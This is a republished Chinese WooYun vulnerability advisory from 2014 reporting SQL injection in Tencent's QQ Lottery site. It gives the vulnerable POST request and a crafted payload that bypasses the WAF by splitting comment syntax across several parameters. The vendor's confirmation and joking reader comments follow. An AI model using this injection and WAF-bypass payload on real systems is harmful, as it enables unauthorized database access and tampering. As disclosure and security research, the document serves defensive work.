腾讯QQ彩票某处SQL注射

admin 2015年5月4日14:24:28评论367 views字数 210阅读0分42秒阅读模式
摘要

2014-07-23: 细节已通知厂商并且等待厂商处理中
2014-07-28: 厂商已经确认,细节仅向厂商公开
2014-08-07: 细节向核心白帽子及相关领域专家公开
2014-08-17: 细节向普通白帽子公开
2014-08-27: 细节向实习白帽子公开
2014-09-06: 细节向公众公开

漏洞概要 关注数(71) 关注此漏洞

缺陷编号: WooYun-2014-69416

漏洞标题: 腾讯QQ彩票某处SQL注射

相关厂商: 腾讯

漏洞作者: Jannock腾讯QQ彩票某处SQL注射

提交时间: 2014-07-23 15:45

公开时间: 2014-09-06 15:46

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 20

漏洞状态: 厂商已经确认

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: php+数字类型注射 注射技巧

6人收藏


漏洞详情

披露状态:

2014-07-23: 细节已通知厂商并且等待厂商处理中
2014-07-28: 厂商已经确认,细节仅向厂商公开
2014-08-07: 细节向核心白帽子及相关领域专家公开
2014-08-17: 细节向普通白帽子公开
2014-08-27: 细节向实习白帽子公开
2014-09-06: 细节向公众公开

简要描述:

腾讯的waf越来越利害了,手中几个注入都成了鸡肋。刚好发现腾讯QQ彩票某处SQL注射,此注入点存在两种方式绕过waf。

详细说明:

注入地址:

code 区域
POST /my/index.php?mod=securityinfo&op=AjaxUpdateTipsSet HTTP/1.1
Host: 888.sports.qq.com

typ=kjhm&kjhm_ssq=1&kjhm_dlt=0&kjhm_fc3d=0&kjhm_pl3=0&kjhm_pl5=0&kjhm_qlc=0&kjhm_qxc=0&kjhm_exw=0&kjhm_sfc=0&kjhm_r9=0&kjhm_jq=0&kjhm_bq=0

除了 typ 参数外,其它参数都存在SQL注入

猜是 update 型 注入

像 update table set kjhm_ssq=1,kjhm_dlt=0 ...... where uid=xxxxx

由于这里太多参数,所以可以结合多参数方式绕过waf拦截

方式1:

code 区域
typ=kjhm&kjhm_pl3=0*/select 2)))/*&kjhm_dlt=0*/((1=1),0,/*&kjhm_pl5=0*//*&kjhm_qlc=0*/&kjhm_qxc=0&kjhm_exw=0&kjhm_sfc=0&kjhm_r9=0&kjhm_jq=0&kjhm_bq=0&kjhm_fc3d=0*/(select 1 union/*&kjhm_ssq=1-(if/*typ=kjhm&kjhm_pl3=0*/select 2)))/*&kjhm_dlt=0*/((1=2),0,/*&kjhm_pl5=0*//*&kjhm_qlc=0*/&kjhm_qxc=0&kjhm_exw=0&kjhm_sfc=0&kjhm_r9=0&kjhm_jq=0&kjhm_bq=0&kjhm_fc3d=0*/(select 1 union/*&kjhm_ssq=1-(if/*

根据参数顺序不同来绕过。有多种组合来实现过滤拦截。

由于大部分工具不支持,那么我们来第二种。

方式2:

参考: WooYun: 腾讯某分站一个比较有意思的SQL注射漏洞

继续可用。。

漏洞证明:

腾讯QQ彩票某处SQL注射

修复方案:

过滤

版权声明:转载请注明来源 Jannock@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2014-07-28 09:27

厂商回复:

非常感谢您的报告,问题已着手处理,感谢大家对腾讯业务安全的关注。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理。

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分


评价

  1. 2014-07-23 15:50 | Anonymous ( 普通白帽子 | Rank:146 漏洞数:30 | 园长是大傻逼)

    2

    很棒

  2. 2014-07-23 15:52 | 乐乐、 ( 普通白帽子 | Rank:878 漏洞数:190 )

    0

    这个屌了。。。

  3. 2014-07-23 15:52 | YY-2012 ( 核心白帽子 | Rank:3861 漏洞数:736 | 意淫,是《红楼梦》原创的词汇,但后来演变...)

    0

    可以中500w吗?

  4. 2014-07-23 15:58 | 浮萍 ( 普通白帽子 | Rank:1077 漏洞数:217 )

    0

    本来我该中奖了,谁给我改了

  5. 2014-07-23 16:02 | zeracker 腾讯QQ彩票某处SQL注射 ( 普通白帽子 | Rank:1077 漏洞数:139 | 爱吃小龙虾。)

    0

    500万 在哪里

  6. 2014-07-23 16:06 | 玉林嘎 腾讯QQ彩票某处SQL注射 ( 普通白帽子 | Rank:941 漏洞数:108 )

    0

    前排卖彩票

  7. 2014-07-23 16:38 | wefgod ( 核心白帽子 | Rank:1829 漏洞数:183 | 力不从心)

    0

    给力

  8. 2014-07-23 17:32 | 紫衣大侠 ( 普通白帽子 | Rank:296 漏洞数:30 | 打杂的~~)

    0

    为毛这么牛B。。。

  9. 2014-07-23 17:34 | Lonely ( 实习白帽子 | Rank:80 漏洞数:30 | 人生如梦,始终都游不过当局者迷的悲哀。)

    0

    我买中了的 结果被洞主改了数据 还我 500万。

  10. 2014-07-23 17:44 | noob ( 实习白帽子 | Rank:85 漏洞数:19 | 向各位大神学习,向各位大神致敬)

    0

    我的1000万是不是你改的!!!

  11. 2014-07-23 17:56 | Aerfa21 ( 普通白帽子 | Rank:216 漏洞数:49 )

    0

    洞主,你是怎么绕waf的?

  12. 2014-07-23 18:20 | 夏殇 ( 实习白帽子 | Rank:44 漏洞数:26 | 不忘初心,方得始终。)

    0

    居然还能挖腾讯sql

  13. 2014-07-23 19:32 | Jn· ( 路人 | Rank:30 漏洞数:14 | 本小菜很可爱,如果不服你TM来打我啊--哎呀...)

    0

    500万呢

  14. 2014-07-23 19:48 | 1c3z ( 普通白帽子 | Rank:307 漏洞数:64 | @)!^)

    1

    非常感谢您的报告,该问题其他白帽子已报告过,感谢大家对腾讯业务安全的关注。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理

  15. 2014-07-23 22:59 | 老和尚 ( 普通白帽子 | Rank:223 漏洞数:45 )

    0

    @1c3z 经常听到...

  16. 2014-07-24 12:17 | CoffeeSafe ( 普通白帽子 | Rank:142 漏洞数:37 )

    0

    今晚一起买彩票~

  17. 2014-07-25 11:33 | 黑色的屌丝 ( 实习白帽子 | Rank:39 漏洞数:6 | →_→→_→)

    0

    我就想知道。一哥怎么快速定位一个注入点的。

  18. 2014-07-28 09:37 | C4ndy ( 路人 | Rank:6 漏洞数:1 )

    0

    我的彩票绝对是让你改的,

  19. 2014-07-28 09:56 | 紫霞仙子 腾讯QQ彩票某处SQL注射 ( 普通白帽子 | Rank:2302 漏洞数:307 | 没好团队,啥都干不成!!!)

    0

    还我100000万

  20. 2014-09-06 17:51 | bey0nd ( 普通白帽子 | Rank:941 漏洞数:148 | 相忘于江湖,不如相濡以沫)

    0

    快速定位一个注入点的

  21. 2014-09-06 18:21 | yinian ( 实习白帽子 | Rank:71 漏洞数:25 | 一花一世界,一叶一菩提。)

    0

    赶紧脱裤

  22. 2014-10-08 17:36 | 胡小树 ( 实习白帽子 | Rank:66 漏洞数:13 | 我是一颗小小树)

    0

    这组合看的真头晕

  23. 2014-11-05 16:38 | 黑吃黑 ( 普通白帽子 | Rank:165 漏洞数:32 | 不是因为看到了希望才去努力,而是努力了才...)

    0

    真的好强大!

  24. 2014-12-19 16:22 | 风之传说 ( 普通白帽子 | Rank:217 漏洞数:39 | 时间在哪里,成就就在哪里.)

    1

    真特么屌爆了。。代码牛伤不起啊。。

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin